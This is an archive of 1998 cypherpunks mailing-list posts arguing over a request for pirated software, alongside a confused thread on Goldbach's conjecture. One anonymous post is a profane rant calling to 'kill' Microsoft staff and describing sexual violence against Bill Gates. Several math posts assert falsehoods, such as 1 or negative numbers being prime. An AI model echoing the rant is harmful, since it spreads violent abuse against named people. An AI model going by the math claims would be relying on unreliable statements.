From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: holist <holist@mail.matav.hu>
Date: Thu, 19 Nov 1998 19:57:20 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811191115.DAA14438@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I only subscribed to this list a few weeks ago. I break my silence in
defense of Bernardo B. Terrado, who was viciously attacked by Adam Hupp and
then rather more graciously advised by Jim Gillogly.

Having read a significant amount of material on the ideological (rather than
the technical) background of cypherpunks (Tim May's writings, mainly) it
seems to me rather obvious that a relative newcomer to these circles would
come to expect to find people who may not be "mannered intellectuals", but
who are certainly not erstwhile defenders of intellectual property,
particularly asthe concept is applied to software today.

I understand that there may be other reasons why it is unwise to post
requests for warez on these lists, but moral outrage at the thought of
software piracy was not one I expected to read here.

Especially as I hear nobody complaining about the advertisement for
pornography that I receive every two days, regular as clockwork, from the
cypherpunks list, not to mention the great deal of other entirely useless,
automatically generated advertising.

Unlike most of you lucky people in the States, I pay through the nose for
on-line time.

Perhaps priorities could do with rethinking.

holist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 19 Nov 1998 21:29:32 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199811191312.HAA02344@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 19 Nov 1998 03:15:07 -0800 (PST)
> To: cypherpunks@toad.com
> From: holist <holist@mail.matav.hu>

You should consider subscribing through one of the normal CDR nodes, the
toad.com site is unreliable.

> come to expect to find people who may not be "mannered intellectuals", but
> who are certainly not erstwhile defenders of intellectual property,
> particularly asthe concept is applied to software today.

Now just exactly what makes you believe that I want other people deciding
what happens to the results of my labor?

I support Open Source software, however not to the extent I want somebody
else to decide without my input whether any given piece happens to Open
Source.

> requests for warez on these lists, but moral outrage at the thought of
> software piracy was not one I expected to read here.

Then perhaps you need to work on  your morality.

> Especially as I hear nobody complaining about the advertisement for
> pornography 

So what? How exactly does pornography map to stolen software?

> Unlike most of you lucky people in the States, I pay through the nose for
> on-line time.

Sounds like a personal problem to me.

> Perhaps priorities could do with rethinking.

I agree, you need to do some rethinking.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 20 Nov 1998 00:05:14 +0800
To: cypherpunks@cyberpass.net
Subject: Piracy and cypherpunks
Message-ID: <36543A3F.37AC99B@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



holist writes:
> Having read a significant amount of material on the ideological (rather than
> the technical) background of cypherpunks (Tim May's writings, mainly) it
> seems to me rather obvious that a relative newcomer to these circles would
> come to expect to find people who may not be "mannered intellectuals", but
> who are certainly not erstwhile defenders of intellectual property,
> particularly asthe concept is applied to software today.

Hurm.  Does Tim May advocate passing around unlicensed copies of an $895
Statgraphics program?  I think I must have missed that post.  In any case,
cypherpunks are not a monolithic bunch.  While many (like me) are wild-eyed
libertarians of one flavor or another, others are feds, corporate shills,
government apologists, prepubescent hackers, and (d'oh) working professionals
in the computing industry.  I, for example, do believe that the concept of
intellectual property makes sense in some cases -- e.g. the inventions of
public-key encryption and the RSA algorithm, which were important breakthroughs
that merit substantial rewards, and I recognize that this is probably not a
majority cypherpunk opinion.  I do <not> appreciate patents on all the
ticky-tack trivial modifications of every silly algorithm that nobody else
thought was worth patenting.

However, pirating commercial software is not a good way to make your protest.
If you don't want to pay for it, write your own version and make it freely
available.

> Especially as I hear nobody complaining about the advertisement for
> pornography that I receive every two days, regular as clockwork, from the
> cypherpunks list, not to mention the great deal of other entirely useless,
> automatically generated advertising.

The difference is that the porn spammers don't read the lists they spam,
so complaining on the list does no good.  The piracy request came from a
fairly regular poster to this list.  Big difference.  One kind of complaint
might lead to a behavioral change, and the other leads only to more noise.

If I <must> be mannered and intellectual when addressing wannabe software
pirates, I'll quote Catullus:  Pedicabo et irrumabo, Mentula!

-- 
	Jim Gillogly
	29 Blotmath S.R. 1998, 15:12
	12.19.5.12.12, 4 Eb 5 Ceh, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 19 Nov 1998 22:02:47 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199811191115.DAA14438@toad.com>
Message-ID: <Pine.SOL.4.05.9811190825490.7428-100000@ultra1-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Nov 1998, holist wrote:

>> Date: Thu, 19 Nov 1998 03:15:07 -0800 (PST)
>> From: holist <holist@mail.matav.hu>
>> To: cypherpunks@toad.com
>> 
>> I only subscribed to this list a few weeks ago. I break my silence in
>> defense of Bernardo B. Terrado, who was viciously attacked by Adam Hupp and
>> then rather more graciously advised by Jim Gillogly.

"viciously attacked" ???  He was begging for warez!  Any self-respecting, 
patriotic Amercian citizen would have reporting him to the IRS for not paying 
his "Warez Tax".  He should be glad that i'm not that person.
 
>> Having read a significant amount of material on the ideological (rather than
>> the technical) background of cypherpunks (Tim May's writings, mainly) it
>> seems to me rather obvious that a relative newcomer to these circles would
>> come to expect to find people who may not be "mannered intellectuals", but
>> who are certainly not erstwhile defenders of intellectual property,
>> particularly asthe concept is applied to software today.

You calling me a "warez pup"?
 
>> I understand that there may be other reasons why it is unwise to post
>> requests for warez on these lists, but moral outrage at the thought of
>> software piracy was not one I expected to read here.

A "pat on the back" and $500 in e-cash instead?
 
>> Especially as I hear nobody complaining about the advertisement for
>> pornography that I receive every two days, regular as clockwork, from the
>> cypherpunks list, not to mention the great deal of other entirely useless,
>> automatically generated advertising.

Are you now complaining about quality free pr0n links???  Where is your 
gratitude?
 
>> Unlike most of you lucky people in the States, I pay through the nose for
>> on-line time.

Yes, CJ is lucky to have the IRS alright.
 
>> Perhaps priorities could do with rethinking.

Tell me about it!  You need some help with yours?
 
>> holist
>> 
>> 

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

_____________________________________________________________
Get Your Private, Free, Encrypted Email at http://www.nsa.gov





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 20 Nov 1998 01:04:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers
Message-ID: <365448AE.D504F2D6@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian wrote:
> "Igor Chudov @ home" wrote:

> > Well, take 11, for example, it cannot be repsesented as a sum of different
> > primes. It cannot, pure and simple.

> Bullshit: 7+5+(-1)=11.  Last I heard, negative numbers weren't excluded from 
> being primes.  7 is different from 5, -1 is different from 7 and from 5.

If this is boiling down to a definition of primes, I'll haul out my Hardy &
Wright, page 2:

    A number p is said to be prime if (i) p > 1, (ii) p has no positive
    divisors except 1 and p.  ...  It is important to observe that 1 is not
    reckoned as a prime.

My number theory class at college (admittedly that was three decades ago)
also started the prime series at 2 and went up from there.  The term
"odd primes" always meant 3 and above, not 1 and above.

YMMV.
-- 
	Jim Gillogly
	29 Blotmath S.R. 1998, 16:29
	12.19.5.12.12, 4 Eb 5 Ceh, Ninth Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 19 Nov 1998 23:26:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Goldbach & two or more primes...
Message-ID: <199811191437.IAA02597@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I'm aware of the Goldbach Reduction by Fermat. The problem is once this
theorem is placed in the geometric domain the fact that n-prime factors can
be reduced to 2 prime factors is critical and a hinderance. 

It simply isn't possible to tile a even aread triangle with two smaller
congruent triangles whose area is prime. As a result Goldbach's older form
is more applicable.

If it can be shown that such a tiling is always possible then by extension
of Fermat's conjecture the two prime supposition is proved.

Reductionism can be a friend or an enemy, swords cut both ways.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 19 Nov 1998 16:35:15 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811190754.IAA15057@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



 #####      #    ######
 #    #     #    #
 #    #     #    #####
 #    #     #    #
 #    #     #    #
 #####      #    ######

                                         #####
 #    #     #     ####   #####    ####  #  #  #   ####   ######   #####
 ##  ##     #    #    #  #    #  #    # #  #     #    #  #          #
 # ## #     #    #       #    #  #    #  #####   #    #  #####      #
 #    #     #    #       #####   #    #    #  #  #    #  #          #
 #    #     #    #    #  #   #   #    # #  #  #  #    #  #          #
 #    #     #     ####   #    #   ####   #####    ####   #          #

 #####      #    ######
 #    #     #    #
 #    #     #    #####
 #    #     #    #
 #    #     #    #
 #####      #    ######


FUCK micro$oft. Kill them all. Nuke Redmond.
Sodomize bILL gATES.
Cut his micro$oft prick and shove it up
his own ass. 
Rabid motherfucking whoremongerz at redmond.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 00:01:10 +0800
To: ravage@einstein.ssz.com (Jim Choate)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers...
In-Reply-To: <199811190522.XAA01164@einstein.ssz.com>
Message-ID: <199811191526.JAA05438@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> Hi,
> 
> I have a question related to Goldbach's Conjecture:
> 
> All even numbers greater than two can be represented as the sum of primes.

Hold on right here, Jim.

Do you mean a sum of DIFFERENT primes?

Because any number greater than 1 can be represented as a sum of some 2s
and some 3s. 

E.g. 8 = 3+3+2, 9 = 3+3+3, 10 = 3+3+2+2, etc.

Since this is so boring, I assume that the primes must be different.

> Is there any work on whether odd numbers can always be represented as the
> sum of primes?

Well, take 11, for example, it cannot be repsesented as a sum of different
primes. It cannot, pure and simple.

So, the above hypothesis is incorrect. No need for high powered math here.

> This of course implies that the number of prime members
> must be odd and must exclude 1 (unless you can have more than a single
> instance of a given prime). Has this been examined?

Why, let's say 5 = 3+2, it is a sum of an even number of primes.

I suggest that first "examination" should always include playing
with trivial examples.

> I'm assuming, since I can't find it explicitly stated anywhere, that
> Goldbachs Conjecture allows those prime factors to occur in multiple
> instances.

If multiple instances are allowed, it is an enormously boring conjecture
for 5 grade school students.

any number above 1 may be represented as a sum of some 3s and some
2s. Big deal.

> I've pawed through my number theory books and can't find anything relating
> to this as regards odd numbers.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillips, Sidney R" <Sid.Phillips@PSS.Boeing.com>
Date: Fri, 20 Nov 1998 02:17:24 +0800
To: "'cypherpunks@Algebra.COM>
Subject: Goldbach Conjecture
Message-ID: <A0C2D81FEEA3D111B6BB00805FE633CF16B032@xch-sea-14.ca.boeing.com>
MIME-Version: 1.0
Content-Type: text/plain



For a reference on the Goldbach Conjecture see:

http://www.astro.virginia.edu/~eww6n/math/GoldbachConjecture.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 02:39:44 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Piracy and cypherpunks
In-Reply-To: <36543A3F.37AC99B@acm.org>
Message-ID: <v03130306b27a0627ea24@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:33 AM -0800 11/19/98, Jim Gillogly wrote:
>holist writes:
>> Having read a significant amount of material on the ideological (rather than
>> the technical) background of cypherpunks (Tim May's writings, mainly) it
>> seems to me rather obvious that a relative newcomer to these circles would
>> come to expect to find people who may not be "mannered intellectuals", but
>> who are certainly not erstwhile defenders of intellectual property,
>> particularly asthe concept is applied to software today.
>
>Hurm.  Does Tim May advocate passing around unlicensed copies of an $895
>Statgraphics program?  I think I must have missed that post.  In any case,
>cypherpunks are not a monolithic bunch.  While many (like me) are wild-eyed
>libertarians of one flavor or another, others are feds, corporate shills,
>government apologists, prepubescent hackers, and (d'oh) working professionals
>in the computing industry.  I, for example, do believe that the concept of
>intellectual property makes sense in some cases -- e.g. the inventions of
>public-key encryption and the RSA algorithm, which were important
>breakthroughs
>that merit substantial rewards, and I recognize that this is probably not a
>majority cypherpunk opinion.  I do <not> appreciate patents on all the
>ticky-tack trivial modifications of every silly algorithm that nobody else
>thought was worth patenting.

Somewhat off-topic, though issues of property, ownership, law, enforcement,
etc., are related to Cypherpunks and/or anarchocapitalist topics.

Anyway, I've expressed my views in many posts, mostly in the early years of
the list, and in the 1994 Cyphernomicon. Off the top of my head, without
reference to these earlier items, here are a few points. Some of them may
contradict other points (I contain multitudes):

-- "warez" distribution is not a primary purpose for Cypherpunks, either at
the physical meetings I've been to, or in the 6 years of the list

-- I generally pay for my programs, though this has often made me a sucker
(paying $400 for a product which failed to perform, or where the company
ceased to exist)

-- I have "borrowed" programs, e.g., pirated them. I think most of us have.
This is not my normal practice, but, then, I don't blithely write out
checks for $400 or $795 for programs I have only _heard_ about, or have
only read _reviews_ of.

(Corporations have the resources, and the number of potential "seats," to
make evaluation purchases feasible. In many cases, even most, the companies
are given copies for evaluation. Private individuals usually have no such
paths available to them. I'm not arguing for a "right of theft" for
individuals, just noting some obvious differences. An individual who has
"borrowed" a copy of a program is in a somewhat different position than,
for example, a corporation which has made 30 illegal copies of that program
for their office use. And not just because of the number of copies, in my
view.)

-- all issues of intellectual property are also issues of _enforceability_.
To the extent anonymous remailers, information markets, regulatory
arbitrage, systems like "BlackNet" ("BlackeBay," anyone?), and other crypto
anarchy technologies proliferate, enforcement of any particular nation's
intellectual property laws will become problematic.


-- finally, the U.S. position on patentability and copyrightability of
software and words is not the only position one may find morally
supportable. We do not, for example, allow "ideas" to be patented or
copyrighted (I don't mean "expressions of ideas," as in patents, or
"precise words," as in copyrights. Rather, I mean that we do not allow a
person to "own" an idea. To imagine the alternative, cf. Galambos.)


Long term, I expect current notions about intellectual property will have
to change.

I'm a big believer in "technological determinism." For example, in my own
view (which I have debated with some well known cyberspace lawyers over the
years), the widespread deployment of video cassette recorders (VCRs)
necessarily changed the intellectual property laws. The Supreme Court, in
Disney v. Sony, uttered a bunch of stuff about time-shifting, blah blah,
but the real reason, I think, boiled down to this:

"VCRs have become widespread. If people tape shows in their own homes, even
violating copyrighted material, there is no way law enforcement can stop
them short of instituting a police state and doing random spot checks. The
horse is out of the barn, the genie is out of the bottle. The law has to
change. But rather than admit that copyright is no longer practically
enforceable, we have to couch our decision in terms of "time-shifting" and
other such fig leaves."

So, too, will anonymous remailers, black pipes, information markets,
regulatory arbitrage, and suchlike change the nature of intellectual
property.

What form these changes will take, I don't know.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 00:40:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers... (fwd)
Message-ID: <199811191556.JAA03049@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers...
> Date: Thu, 19 Nov 1998 09:26:56 -0600 (CST)
> From: ichudov@Algebra.Com (Igor Chudov @ home)

> > All even numbers greater than two can be represented as the sum of primes.
> 
> Do you mean a sum of DIFFERENT primes?

None of the references that I've looked at state it clearly but I assume
that it must be or else we could just use 1 for everything.

> > Is there any work on whether odd numbers can always be represented as the
> > sum of primes?
> 
> Well, take 11, for example, it cannot be repsesented as a sum of different
> primes. It cannot, pure and simple.

Sure it can, 1 + 3 + 7. It can't be the PRODUCT of two lower primes since
it wouldn't be prime then. This sum by the way CAN'T be reduced to two primes
so Fermat's Conjecture applied to odds is clearly false.

The only proviso is the number we want to sum TO must be greater than 2.

ALL numbers can be represented as sums of primes, the question is whether
you allow repeats or not.

> > This of course implies that the number of prime members
> > must be odd and must exclude 1 (unless you can have more than a single
> > instance of a given prime). Has this been examined?
> 
> Why, let's say 5 = 3+2, it is a sum of an even number of primes.

In the number theory realm, I agree. In the geometric real (in particular
using equilateral triangles) those constraints hold.

Note that the smallest number of sums for your example above is odd. The
reason that you must exclude the problem becomes trivial if you aren't
required to sum the 1's.

> I suggest that first "examination" should always include playing
> with trivial examples.

No kidding?

> If multiple instances are allowed, it is an enormously boring conjecture
> for 5 grade school students.
> 
> any number above 1 may be represented as a sum of some 3s and some
> 2s. Big deal.

Actualy they are simply sums of 1's, its actualy first grade math.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 00:35:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: manners (fwd)
Message-ID: <199811191606.KAA03196@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Richard.Bragg@ssa.co.uk
> Date: Thu, 19 Nov 1998 15:14:44 +0000
> Subject: manners

> There are ways and means.  If someone requests software that is NOT free
> then a simple NO will surfice.  A list of contacts to purchase would aid
> income for the producer.
> An additional approach would be to suggest alternatives that are free.
> 
> There is never any call to be rude.

Agreed, just be sure you can recognize the difference between rude and
simply uncomfortable directness.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 00:38:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd (fwd)
Message-ID: <199811191607.KAA03257@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 19 Nov 1998 11:01:31 -0500
> From: Ray Arachelian <sunder@brainlink.com>
> Subject: Re: Goldbach's Conjecture - a question about prime sums of odd 
>  numbers...

> Bullshit: 7+5+(-1)=11.  Last I heard, negative numbers weren't excluded from 
> being primes.  7 is different from 5, -1 is different from 7 and from 5.

Shit! I wasn't even thinking of negatives....

Thanks.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 20 Nov 1998 01:06:55 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of oddnumbers...
In-Reply-To: <199811190522.XAA01164@einstein.ssz.com>
Message-ID: <v04011750b279e6916c78@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:22 AM -0500 11/19/98, Jim Choate wrote:
>Hi,
>
>I have a question related to Goldbach's Conjecture:
>
>All even numbers greater than two can be represented as the sum of primes.
>
>Is there any work on whether odd numbers can always be represented as the
>sum of primes? This of course implies that the number of prime members
>must be odd and must exclude 1 (unless you can have more than a single
>instance of a given prime). Has this been examined?
>
>I'm assuming, since I can't find it explicitly stated anywhere, that
>Goldbachs Conjecture allows those prime factors to occur in multiple
>instances.
>
>I've pawed through my number theory books and can't find anything relating
>to this as regards odd numbers.

	Well, since all primes over 2 are odd, and the sum of two odd
numbers is always even, there goes that theory.

	Unless they changed the rules on primes since I last checked.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 20 Nov 1998 00:53:39 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of oddnumbers...
In-Reply-To: <199811190522.XAA01164@einstein.ssz.com>
Message-ID: <v04011752b279e7168bc6@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:22 AM -0500 11/19/98, Jim Choate wrote:
>Hi,
>
>I have a question related to Goldbach's Conjecture:
>
>All even numbers greater than two can be represented as the sum of primes.
>
>Is there any work on whether odd numbers can always be represented as the
>sum of primes? This of course implies that the number of prime members
>must be odd and must exclude 1 (unless you can have more than a single
>instance of a given prime). Has this been examined?
>
>I'm assuming, since I can't find it explicitly stated anywhere, that
>Goldbachs Conjecture allows those prime factors to occur in multiple
>instances.
>
>I've pawed through my number theory books and can't find anything relating
>to this as regards odd numbers.

	Whoops, jumped the gun on that last one, didn't read thru a second
time.

	Sorry.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 03:36:35 +0800
To: cypherpunks@cyberpass.net
Subject: RE: manners
In-Reply-To: <802566C1.00536A3E.00@seunt002e.ssa.co.uk>
Message-ID: <v03130308b27a179a06c4@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:21 AM -0800 11/19/98, Iain Collins wrote:
>> -----Original Message-----
>> From: owner-cypherpunks@toad.com [mailto:owner-cypherpunks@toad.com]On
>> Behalf Of Richard.Bragg@ssa.co.uk
>> Sent: 19 November 1998 15:15
>> To: cypherpunks@toad.com
>> Subject: manners
>>
>>
>> There are ways and means.  If someone requests software that is NOT free
>> then a simple NO will surfice.  A list of contacts to purchase would aid
>> income for the producer.
>> An additional approach would be to suggest alternatives that are free.
>>
>> There is never any call to be rude.
>
>It is _rude_ to ask for stolen goods - particularly when implicating
>everyone on this list as an accessory to intent to commit piracy - who does
>not report this luser to the authorities in the - process.

Nonsense. I am not "implicated" as an accessory to anything. Speak for
yourself only.

There is no basis in law for the notion that several hundred subscribers to
a mailing list are implicated in something because others talk about it.
Get real.

As for the claim that we are "lusers" if we don't report this request, let
us know how your own report is received. I will check for your posts
regularly, and report you to the proper authorities if you fail in your
self-declared duty here.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 01:30:16 +0800
To: sunder@brainlink.com (Ray Arachelian)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd
In-Reply-To: <365440DB.A689C02@brainlink.com>
Message-ID: <199811191653.KAA06166@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Ray Arachelian wrote:
> 
> 
> "Igor Chudov @ home" wrote:
> 
> > Well, take 11, for example, it cannot be repsesented as a sum of different
> > primes. It cannot, pure and simple.
> 
> Bullshit: 7+5+(-1)=11.  Last I heard, negative numbers weren't excluded from 
> being primes.  7 is different from 5, -1 is different from 7 and from 5.

I have no idea where you heard it, but primes are numbers greater than 1,
by definition.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 20 Nov 1998 00:45:35 +0800
To: Igor Chudov <ichudov@Algebra.COM>
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers...
In-Reply-To: <199811191526.JAA05438@manifold.algebra.com>
Message-ID: <365440DB.A689C02@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



"Igor Chudov @ home" wrote:

> Well, take 11, for example, it cannot be repsesented as a sum of different
> primes. It cannot, pure and simple.

Bullshit: 7+5+(-1)=11.  Last I heard, negative numbers weren't excluded from 
being primes.  7 is different from 5, -1 is different from 7 and from 5.


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 01:50:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd (fwd)
Message-ID: <199811191719.LAB04034@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Goldbach's Conjecture - a question about prime sums of odd
> Date: Thu, 19 Nov 1998 10:53:50 -0600 (CST)
> From: ichudov@Algebra.Com (Igor Chudov @ home)

> I have no idea where you heard it, but primes are numbers greater than 1,
> by definition.

Actualy a prime is any number which has no multiplicitave factors other than
itself and 1.

Does that mean negatives can't be prime numbers?

So, -3 breaks down to:

-3 * 1 = -3; 3 * -1 would be another set of factors so negatives can't be
primes in the strictest sense.




    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 01:46:56 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers (fwd)
Message-ID: <199811191722.LAA04172@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 19 Nov 1998 12:18:26 -0500
> From: Ray Arachelian <sunder@brainlink.com>
> Subject: Re: Goldbach's Conjecture - a question about prime sums of odd numbers

> So I guess I have to take back 7+5+(-1) and go with Jim's 1+3+7, but fuck,
> that won't work either since 1 isn't a prime...  So I guess Igor is right on
> this one.  Sorry Jim... 

A prime is defined as *ANY* number (note the definition doesn't mention
sign or magnitude nor does it exclude any numbers a priori) that has no
multiplicative factors other than itself and 1.

1 * 1 = 1 so it is clearly prime.

Now, if a particular branch of number theory wants to extend it and make it
only numbers >=2 that is fine, I'm not working in that branch anyway.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
